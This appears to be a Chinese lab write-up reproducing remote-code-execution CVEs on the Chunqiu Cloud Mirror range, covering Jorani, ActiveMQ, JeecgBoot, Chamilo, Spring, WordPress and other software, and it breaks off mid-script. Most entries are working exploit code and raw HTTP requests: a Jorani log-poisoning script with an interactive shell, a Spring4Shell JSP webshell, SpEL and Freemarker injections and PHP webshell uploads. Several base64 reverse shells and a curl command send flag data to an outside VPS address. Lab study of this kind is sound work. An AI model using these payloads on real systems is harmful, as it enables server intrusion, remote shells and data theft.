Bootstrap

春秋云镜-RCE靶场漏洞复现

CVE-2023-26469

f790d4dcbe47e99b64140abc84a9c1be.png
image.png

靶标介绍:
Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。

第一步获取COOKIE:
2417b0b0efe183970a339169cfb2c090.png
第二部构造POC

POST /session/login HTTP/1.1
Host: eci-2zed055p3vx358m47fe4.cloudeci1.ichunqiu.com
User-Agent: python-requests/2.27.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Cookie: csrf_cookie_jorani=9eae92b83ce7a1299230819705af932e; jorani_session=d382f26e52783e85e91dec9878ab96cedde4dc41
Content-Length: 160
Content-Type: application/x-www-form-urlencoded

csrf_test_jorani=9eae92b83ce7a1299230819705af932e&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<%3f%3d`$_GET[1]`%3f>&CipheredValue=test

第三步 执行命令

25eade032a8dfe6c7ba71bc3e5974e8b.png
image.png

还有一个一键RCE的EXP
github上的

"""
vulnerability covered by CVE-2023-26469
"""
import readline
import requests
import datetime
import sys
import re
import base64
import random
import string
 
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 
msg = lambda x,y="\n":print(f'\x1b[92m[+]\x1b[0m {x}', end=y)
err = lambda x,y="\n":print(f'\x1b[91m[x]\x1b[0m {x}', end=y)
log = lambda x,y="\n":print(f'\x1b[93m[?]\x1b[0m {x}', end=y)
 
CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"')
CMD_PATTERN = re.compile('---------(.*?)---------', re.S)
 
URLS = {
 'login' : '/session/login',
 'view' : '/pages/view/',
}
 
alphabet = string.ascii_uppercase
HEADER_NAME = ''.join(random.choice(alphabet) for i in range(12))
 
BypassRedirect = {
 'X-REQUESTED-WITH' : 'XMLHttpRequest',
 HEADER_NAME  : ""
}
 
INPUT = "\x1b[92mjrjgjk\x1b[0m@\x1b[41mjorani\x1b[0m(PSEUDO-TERM)\n$ " # The input used for the pseudo term
 
u = lambda x,y: x + URLS[y]
 
POISON_PAYLOAD  = "<?php if(isset($_SERVER['HTTP_" + HEADER_NAME + "'])){system(base64_decode($_SERVER['HTTP_" + HEADER_NAME + "']));} ?>"
PATH_TRAV_PAYLOAD = "../../application/logs"
 
if __name__ == '__main__':
 print("""
 /!\\ Do not use this if you are not authorized to /!\\
  """)
 log("POC made by @jrjgjk (Guilhem RIOUX)", "\n\n")
 
 if(len(sys.argv) == 1):
  err(f"Usage: {sys.argv[0]} <url>")
  exit(0)
 
 log(f"Header used for exploit: {HEADER_NAME}") 
 
 
 t = sys.argv[1]
 
 s = requests.Session()
 log("Requesting session cookie")
 res = s.get(u(t,"login"), verify = False)
 
 C = s.cookies.get_dict()
 
 Date = datetime.date.today()
 log_file_name = f"log-{Date.year}-{str(Date.month).zfill(2)}-{str(Date.day).zfill(2)}"
 
 csrf_token = re.findall(CSRF_PATTERN, res.text)[0] 
 log(f"Poisonning log file with payload: '{POISON_PAYLOAD}'")
 log(f"Set path traversal to '{PATH_TRAV_PAYLOAD}'")
 msg(f"Recoveredd CSRF Token: {csrf_token}")
 
 data = {
  "csrf_test_jorani" : csrf_token,
  "last_page"   : "session/login",
  "language"   : PATH_TRAV_PAYLOAD,
  "login"    : POISON_PAYLOAD,
  "CipheredValue"  : "DummyPassword"
 }
 
 s.post(u(t,"login"), data=data)
 
 log(f"Accessing log file: {log_file_name}")
 
 exp_page = t + URLS['view'] + log_file_name
 
 ### Shell
 cmd = ""
 while True:
  cmd = input(INPUT)
  if(cmd in ['x', 'exit', 'quit']):
   break
  elif(cmd == ""):
   continue
  else:
   BypassRedirect[HEADER_NAME] = base64.b64encode(b"echo ---------;" + cmd.encode() + b" 2>&1;echo ---------;")
   res = s.get(exp_page, headers=BypassRedirect)
   cmdRes = re.findall(CMD_PATTERN, res.text)
   try:
    print(cmdRes[0])
   except:
    print(res.text)
    err("Wow, there was a problem, are you sure of the URL ??")
    err('exiting..')
    exit(0)
6aee1aebb32193c8ac0d3a861492bca1.png
image.png

CVE-2023-46604

0bf3419e6118b3d9153b1175f956b48a.png
靶标介绍:
Apache ActiveMQ是最流行的开源、多协议、基于 Java 的消息代理。它支持行业标准协议,用户可以从多种语言和平台的客户端使用AMQP协议集成多平台应用程序。2023年10月,Apache ActiveMQ官方发布新版本,修复了一个远程代码执行漏洞,攻击者可构造恶意请求通过Apache ActiveMQ的61616端口发送恶意数据导致远程代码执行,从而完全控制Apache ActiveMQ服务器。
03d438784428b9aced4bf94c7c3a601c.png
POC.xml

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
       http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>bash</value>
                <value>-c</value>
                <value>{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4yMzYuNDEuNTIvMjIyMiAwPiYxCg==}|{base64,-d}|{bash,-i}</value>
            </list>
        </constructor-arg>
    </bean>
</beans>

3d468178446275022c694406222b6982.png
把poc放在vps的服务器上
vps 监听
613a60c5dc76fae0e40aa90333fbea7b.png
urlpoc:

?active=org.springframework.context.support.ClassPathXmlApplicationContext&name=http://xxxx/poc.xml

a6820b81261ba3ced60af725d890d617.png
vps成功复现
ddcdcfbbc8d87ba36d77c18acb877b47.png

CVE-2023-4450

da6c9bd8b2164d639bcf300634219b2b.png
靶标介绍:
JeecgBoot 是一个开源的低代码开发平台,Jimureport 是低代码报表组件之一。当前漏洞在 1.6.1 以下的 Jimureport 组件库中都存在,由于未授权的 API /jmreport/queryFieldBySql 使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。

16cbac9d966af343f774c073ae30a50c.png
POC

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate, br
Accept: */*
Content-Type: application/json
Content-Length: 102

{"sql":"select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"whoami  \") }' "}

6e822fc7c85ce7708ef0826c8afb72be.png
发送过去不行 去掉jeecg-boot

POST /jmreport/queryFieldBySql HTTP/1.1
Host: eci-2zeja7gcioei33loh9go.cloudeci1.ichunqiu.com:8080
Content-Length: 104
Accept: application/json, text/plain, */*
JmReport-Tenant-Id: null
X-Access-Token: null
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
token: null
Content-Type: application/json;charset=UTF-8
Origin: http://eci-2zeja7gcioei33loh9go.cloudeci1.ichunqiu.com:8080
Referer: http://eci-2zeja7gcioei33loh9go.cloudeci1.ichunqiu.com:8080/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1722401552; Hm_lpvt_5819d05c0869771ff6e6a81cdec5b2e8=1722401552; HMACCOUNT=E3AC733F0C7A7E1C
Connection: close

{"sql":"select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"whoami  \") }' "}

e8caacf82b5ffb397d39cdd47a3d726e.png
成功执行whoami
0227854cd07c101f607d893aaf3c3817.png

CVE-2023-38646

f009041875a50210a86d3df3303c301b.png
靶标介绍:
Metabase,一款流行的商业智能和数据可视化工具,被发现存在严重的安全漏洞,即CVE-2023-38646,允许攻击者在无需身份验证的情况下执行服务器级命令。

环境起不来 参考:
CVE-2023-38646:Metabase远程命令执行漏洞-腾讯云开发者社区-腾讯云

CVE-2023-3368

6b76762f60aaa38b1594f3fc6982e73e.png
image.png

靶标介绍:
Chamilo 是一个基于 PHP 的开源学习管理系统 (LMS),可促进在线教育和培训。它提供课程创建、内容管理、评估、协作和提供教育资源等功能。

f7ccec73b44a3c113cab510fb6d96182.png
image.png

漏洞点:
cab395722d05f8d893e0be6bd56aca6c.png

poc:
9f5eb93ba44c7425190893b03912fed7.png
手动没成功 先看看脚本
77215db69333d2f95653054b2ab05089.png没用 查看说是无回显 c
1a6a5b9513d13c26426f5179c3c24f18.png
vps 监听

python3 a.py  -u http://eci-2zegh7mwac5e95m0msq2.cloudeci1.ichunqiu.com/ -c "curl http://47.236.41.52:2222/?data=\$(cat /flag)"

b49bb752d738d2c1eae485cfde8d006b.png
成功获取到flag

#!/usr/bin/env python3
import argparse
import requests

SOAP_REQUEST_TEMPLATE = '''<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{url}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">{payload}</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>
'''

def execute_command(url, command, technique):
    payload = f'$({command})' if technique == 'substitution' else f""""\n{command}\n"""
    data = SOAP_REQUEST_TEMPLATE.format(url=url, payload=payload)

    try:
        response = requests.post(f'{url}/main/webservices/additional_webservices.php', data=data, headers={'Content-Type': 'application/xml'})
        return (response.status_code == 200 and "wsConvertPptResponse" in response.text)
    except:
        return False

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', help='Url of your Chamilo', required=True)
    parser.add_argument('-c', '--command', help='Command to execute', required=False)
    parser.add_argument('-t', '--technique', default='substitution', choices=['substitution', 'newline'], help='Command to execute', required=False)

    args = parser.parse_args()

    if args.command is None:
        if execute_command(args.url, 'id', args.technique):
            print(f'URL vulnerable: {args.url}')
        else:
            print(f'URL not vulnerable: {args.url}')
    else:
        if execute_command(args.url, args.command, args.technique):
            print(f'Command executed: {args.command}')
        else:
            print(f'An error has occured, URL is not vulnerable: {args.url}')

if __name__ == '__main__':
    main()

参考:https://blog.csdn.net/qq_45240382/article/details/140508414

CVE-2024-0195

cc5136a7d6ea9e596212a3ebdd652604.png
靶标介绍:
SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器

1c6af191c2f18179b2c94c7e684001b4.png
点击保存抓包
2e28e0b9415b73700b44ad1df9f0a126.png
post内容改为这个

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzQ3LjIzNi40MS41Mi8yMjIyIDA+JjEK}|{base64,-d}|{bash,-i}")%3B%7B

3f1e87cecfbeb0f5c8a5ea4a4d6d5ac0.png
监听
这里一直没有弹shell 回来 但是能dnslog 也不知道那出了问题

最后参考:https://blog.csdn.net/qq_45240382/article/details/140525453
获得flag
5568f627f602e78bf600dcda8a506db8.png

CVE-2023-27372

aa4a067cb44af210f645fa474307cdf5.png
image.png

靶标介绍:
SPIP cms V4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当,没有对序列化字符串进行过滤从而触发命令执行漏洞。

9dba22784599444d8c7c6f324c16bcd5.png
漏洞存在与密码重置功能中(漏洞点位url:/spip.php?page=spip_pass),重置密码时 protege_champ()函数没有对序列化字符串进行过滤,从而触发命令执行漏洞。

page=spip_pass&formulaire_action=oubli&formulaire_action_args=FE2zn8bKCx%2FVvPGBZIy92xUMWka8Q0Q28cFkYIXxT6BHAyltGN%2FwrwHTdofC9Gp0cejs9ntYLv7I5cq%2F&formulaire_action_sign=&oubli=s%3a19%3a"<%3fphp+phpinfo()%3b+%3f>"%3b&nobot=

deb75113f1359aa699d13a83d3597d07.png
cat /flag
7723022b1346ec1554c7fe9b9a6756b9.png

CVE-2022-26965

964763516c43cdc93335e09b25d9e4a1.png
image.png
  • Pluck-CMS-Pluck-4.7.16 后台RCE

1d5be6455198ad53dcb71b3e33f09e6b.png存在一个admin/
点击会跳转到登录界面
a85f2ba9b8378edd5740e227ddc39d5f.png
输入admin
4c53801166c667d8ac2535506002fe65.png
登录成功
安装主题处存在上传导致的rce
91724a297bda6cebef9a6acb60d8599c.png
3d71095d15623a0874ae3d728463a1c3.png
点击install 就跳转到这里
需要去下载一个主题 ,
GitHub - billcreswell/miniport: Theme for Pluck CMS
2f2fd99c229aa99d50ee88e0897e7ae5.png
压缩然后上传
f43a3bb33625f4c7f4ef1851401eb5e8.png
e2c5b10319aa5b7f21910881afcce430.png
直接访问获取flag了

CVE-2022-25578

7a5d0f2fa9a08315321bb26d99f4125d.png
taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码
054a3502c7192ab5632361761a2eb04c.png

直接输入admin 会跳转后台登录地址
/admin/admin.php?action=frame&ctrl=login
4ae4f29ab173b7b192390b4971cf5676.png
账号密码 admin tao
3f97233472b609dea9c80cab6af9c5c3.png
登录之后看 文件管理
481dae2db7afc375e69daadeb00cb9cb.png
可以直接编辑文件
1091603a83e932b041ac7d97f87a57ee.png

CVE-2022-25099

8c3507857a98b6c24ea306cfd4f35495.png
靶标介绍:
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE
e3f1fb4d7fd695df88161ef4fb100151.png
首页页面是这个
先输入admin/ 能直接进入admin管理页面
4c6c3c01c97ea1ada270145034747c11.png
输入账号/密码 admin/123456
进入后台
根据提示是/language/install.php 存在远程代码执行
99347cf1b765bfde8dacb17c0171d979.png
在add-ons 找到 Languages
0a0b4fcf557c85b987f65b758f6832b2.png
存在文件上传
直接上传即可查看flag

<?php system("cat /f*"); ?>
73c21831758bea4ec71204bdeb397e11.png
image.png

CVE-2022-24663

ee4e7a2c5260c8fb479444dffced1ae4.png
靶标介绍:
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令
1d981b036eee6484917d600a2c440b20.png
是由wordpress搭建的
直接wp-admin 到登录界面 ,wordpress的漏洞基本都存在于后台
4c643dd8a477746dbbf5a70b8d7d4a66.png
test/test登录后台

PHP Everywhere 是一个 WordPress 插件,它允许在 WordPress 网站的任意位置(如页面、帖子、小工具和模板文件)执行 PHP 代码。这个插件对于希望在其网站上嵌入动态内容的开发人员和高级用户非常有用。然而,它也带来了安全风险,尤其是在权限控制不当的情况下。

PHP Everywhere 插件的主要功能是通过短代码 [php_everywhere] 使用户能够在 WordPress 内容中插入和执行 PHP 代码。以下是其使用示例:

[php_everywhere]
<?php
 echo "Hello, World!";
?>
[/php_everywhere]

当这个短代码被解析时,PHP 代码将被执行,并在前端输出“Hello, World!”。
EXP:

<form action="http://eci-2zef6g26haapjjkbw3y9.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php" method="post">
      <input name="action" value="parse-media-shortcode" />
      <textarea name="shortcode">[php_everywhere] <?php file_put_contents("/var/www/html/fuck.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWzFdKTsgPz4=")); ?>[/php_everywhere]</textarea>
      <input type="submit" value="Execute" />
</form>

把这个exp再任意页面修改
dfb8b1c0d03b6606fa6b1b50342a388b.png
回车之后会出现这个
aca9752053b143c23ef5bd485161168a.png
修改为直接查看flag
38627a9bb9de09e2dc538021602eaf3c.png
点击execute
991870f9e5aede848c2a727bc0007cff.png
会跳转 然后直接出现flag

CVE-2022-23906

7e14fcc61222dafbac147e4a976334b6.png
靶标介绍:
CMS Made Simple v2.2.15 被发现包含通过上传图片功能的远程命令执行 (RCE) 漏洞。此漏洞通过精心制作的图像文件被利用。
527c0f47939dec783e16eec62d295f68.png
点击here跳转到后台登录
admin / 123456 进后台
36ecd0403ad1c931eff0981f05351c5c.png
找到上传文件的地方
c7ed334abbcc8b8dc73db9f58e3df89b.png
上传一张图片马
ec65d06d8ff2c9a440ed3a095fd980fd.png重命名是不行的
96a19021b3066f6b40e75e6eddfe5e37.png
点击copy 修改就可以成功
47d78bb2e7d966ad696cca6642981b5e.png
3695da4b43fb5464de5d08eb38c6cf0c.png
3300168c4302d56c062a7898c524eaf9.png

CVE-2022-22965

806b04e0939b3e525e2570ab28c6208d.png
靶标介绍:
Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。
fff6807078708223b6f8735af836e91e.png
打开白板 ,
网上POC

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.32.132:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71   Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1

564a2c9c99c3c0c118640647595b82d7.png
发送返回200 就代表成功 一般
然后去访问 shell
/tomcatwar.jsp?pwd=j&cmd=id

http://eci-2zec2g7iuz50jtvzzkrm.cloudeci1.ichunqiu.com:8080/tomcatwar.jsp?pwd=j&cmd=cat%20/flag
78679b2a5ad7f1e44721f92dbf09d59a.png
image.png

CVE-2022-22963

c7a9d7e95f923de08d29d8b343fea481.png
靶标介绍:
SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。

POC:
9007ccdeb87f88af086413c9c7579d04.png

POST /functionRouter HTTP/1.1
Host: 39.106.48.123:32818
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvNDcuMjM2LjQxLjUyLzcwMDMgMD4mMQ==}|{base64,-d}|{bash,-i}")
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
55c31d2572cd1be2cdd7fb0905f16093.png
image.png

CVE-2022-22947

32de5baffa292511ffac88d3c1d748f4.png
靶标介绍:
Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)发生在Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可通过该漏洞恶意创建允许在远程主机上执行任意远程执行的请求。
参考:
CVE漏洞复现-CVE-2022-22947-Spring Cloud Gateway RCE - 私ははいしゃ敗者です - 博客园
总共发送三次:
第一次:

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: eci-2ze2otokfz7hsqnilgwf.cloudeci1.ichunqiu.com:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 331

{
  "id": "wuyaaq",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

第二次:

POST /actuator/gateway/refresh HTTP/1.1
Host: eci-2ze2otokfz7hsqnilgwf.cloudeci1.ichunqiu.com:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Content-Length: 3
Content-Type: application/x-www-form-urlencoded
Origin: null
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0

a=1

第三次

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: eci-2ze2otokfz7hsqnilgwf.cloudeci1.ichunqiu.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

然后访问url

http://eci-2ze2otokfz7hsqnilgwf.cloudeci1.ichunqiu.com:8080/actuator/gateway/routes/hacktest

9fcfe25311c47862c071534c06e650a3.png
反弹shell
f4e29dea5fd50781c1ffc21be148d5ba.png

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: eci-2ze2otokfz7hsqnilgwf.cloudeci1.ichunqiu.com:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 387

{
  "id": "hacktest",
 "filters": [{
"name": "AddResponseHeader",
"args": {
  "name": "Result",
  "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvNDcuMjM2LjQxLjUyLzcwMDMgMD4mMQ==}|{base64,-d}|{bash,-i}\").getInputStream()))}"
}
  }],
  "uri": "http://example.com"
}

CVE-2022-22909

6cfdb09087d2041ba3d15d42d421ab42.png
Hotel Druid RCE
46ec5f968d8a8e759aaaf80c2c9c5aef.png
直接使用POC复现
https://github.com/0z09e/CVE-2022-22909
先点击go 出现这个页面
f9c775ae5c95f78aac66d69279751a32.png
然后使用exp才能拿shell
5e274d5f5cffb407cfa8f11eeaca4444.png
603b5ef541ffa6e96fe95ee8949efb99.png

CVE-2022-2073

e1278cbe2ad148a359de674f0bd43eda.png
靶标介绍:
Grav CMS 可以通过 Twig 来进行页面的渲染,使用了不安全的配置可以达到远程代码执行的效果,影响最新版 v1.7.34 以下的版本
1c46c89f592544a4240857d69eb70ce1.png
随便注册一个用户进入后台
删掉 替换为payload
b35f7461f2771217e2a95b40d5b1bb90.png
ede2d57a7a2dd1a1dbead45c294789ca.png

{{['cat\x20/flag']|filter('system')}}

保存
访问首页
bbd8db663df0bbc2d651fe5eee0afb4b.png

CVE-2022-0848

68b89a565c8dda960f408b8563ae4634.png
part-db RCE
bb93030e467d78cd2247b358f00052af.png
EXP:

echo "GIF89a
<?php
system('cat /flag');
system('cat flag');
system($_REQUEST['cmd']);
system(urldecode("export%20PATH%3D%24PATH%3A%2Fusr%2Flocal%2Fsbin%3A%2Fusr%2Flocal%2Fbin%3A%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin%3BTAGS%3D%2288f2%22%221648%22%3BTAGE%3D%22f8a%22%22511%22%3Basenc()%7B%20cat%20%22%24%40%22%3B%20%7D%3Basexec()%20%7B%20APWD%3D%22root%22%3B%0A%20%20%20%20if%20%5B%20-z%20%24APWD%20%5D%3B%20then%20MYSQLPWD%3D%22%22%3B%20else%20MYSQLPWD%3D%22-p%24%7BAPWD%7D%22%3B%20fi%3B%0A%20%20%20%20mysql%20--xml%20--raw%20-B%20-hlocalhost%20-uroot%20%24MYSQLPWD%20-Dzzcms%20%3C%3C'EOF'%0ASELECT%20*%20FROM%20%60flag%60%20ORDER%20BY%201%20DESC%20LIMIT%200%2C20%3B%3B%0ASELECT%20ROW_COUNT()%20as%20%22Affected%20Rows%22%3B%0AEOF%0A%20%20%20%20%20%7D%3Becho%20-n%20%22%24TAGS%22%3Basexec%7Casenc%3Becho%20-n%20%22%24TAGE%22%3B"));
phpinfo();
?>

1f7b195c0918bb496fdd22a8ed3cd632.png
payload:

curl -i -s -X POST -F "[email protected]" "http://eci-2zei27asrzyq0xmntx8j.cloudeci1.ichunqiu.com/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'

然后访问

http://eci-2zec5o0zg4vgt6fp6anp.cloudeci1.ichunqiu.com/data/media/labels/shell.pht
5bb6640af200ca2c2082d445e92ee056.png
image.png

CVE-2022-0543

96d17677d9a8108597ebc937ea3484f3.png
首页会提示参数url
经过测试url 是可以进行ssrf 和url跳转的
使用file协议进行文件读取
8a2e1889604be420f9147f813486c23b.png
沙箱逃逸参考:
https://mp.weixin.qq.com/s/4fAmmkcyCTqY_B-U5Mr0kw

CVE-2021-41773

靶标介绍:
2021年10月5日,Apache发布更新公告,修复了Apache HTTP Server 2.4.49中的一个路径遍历和文件泄露漏洞(CVE-2021-41773)。 攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“require all denied” 访问控制参数的保护,则这些恶意请求就会成功。除此之外,该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。
5685e5f032f8f235090907104195f178.png
文件读取payload/

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1

参考:
https://blog.csdn.net/qq_59975439/article/details/125225949

CVE-2021-41402

e7139938db5a974ed86010e1b85553ab.png
靶标介绍:
flatCore-CMS v2.0.8 存在后台任意代码执行漏洞
admin/12345678
585a248e451ca17f5d39ab31a9153cae.png
进入后台
54dc9f0a6e9143d076b58f744f9787cc.png
有一个install 可以上传文件
直接上传一个 php文件即可
9300f1d071690cec744a095f65f12755.png
路径 /

/upload/plugins/shell.php

CVE-2021-34257

4926ca1787c8fc216b9a100940046142.png
靶标介绍:
WPanel是一个用于构建博客、网站和网络应用程序的CMS。 WPanel 4 4.3.1 及更低版本存在安全漏洞,该漏洞源于通过恶意 PHP 文件上传。
b687893f64160486940433557f2e27a8.png
后台存在漏洞

/index.php/admin/login
[email protected]/admin

3b3096c00e2bf627b2d3ac3bc0b2c5ab.png
头像处文件上传
c4acccc70dbc3f3814033e3b45d946c3.png
要选择 Change avatar
10417a5c07da8b8366734e128529d406.png

CVE-2021-32682

靶标介绍:
elFinder 是一个开源的 web 文件管理器,使用 jQuery UI 用 JavaScript 编写。Creation 的灵感来自于 Mac OS X 操作系统中使用的 Finder 程序的简单性和便利性。 其低版本中存在命令注入

a5ff97a62735bc68a0caf29cda75b192.png
查看elfinder.html
426ff113ab86f75fb871d1e5446f7b26.png
新建一个文件 ,然后再选择a.txt 压缩为zip
540632c511f22d128fda095d523f9391.png

参考:https://blog.csdn.net/niubi707/article/details/128192338
https://github.com/nickswink/CVE-2021-32682
POC 成功
93e99cf3756df7cc49db8c3007f6848a.png
110c07f51e7730ceb3cbf0eb80b07046.png

CVE-2021-32305

ab2c38679de698b880c35b1e9fcd95b8.png
image.png

靶标介绍:
WebSVN是一个基于Web的Subversion Repository浏览器,可以查看文件或文件夹的日志,查看文件的变化列表等。其search.php?search= 参数下过滤不严谨导致RCE。
使用POC:

import requests
import argparse
from urllib.parse import quote_plus
 
PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/x.x.x.x/2222 0>&1'"
REQUEST_PAYLOAD = '/search.php?search=";{};"'
 
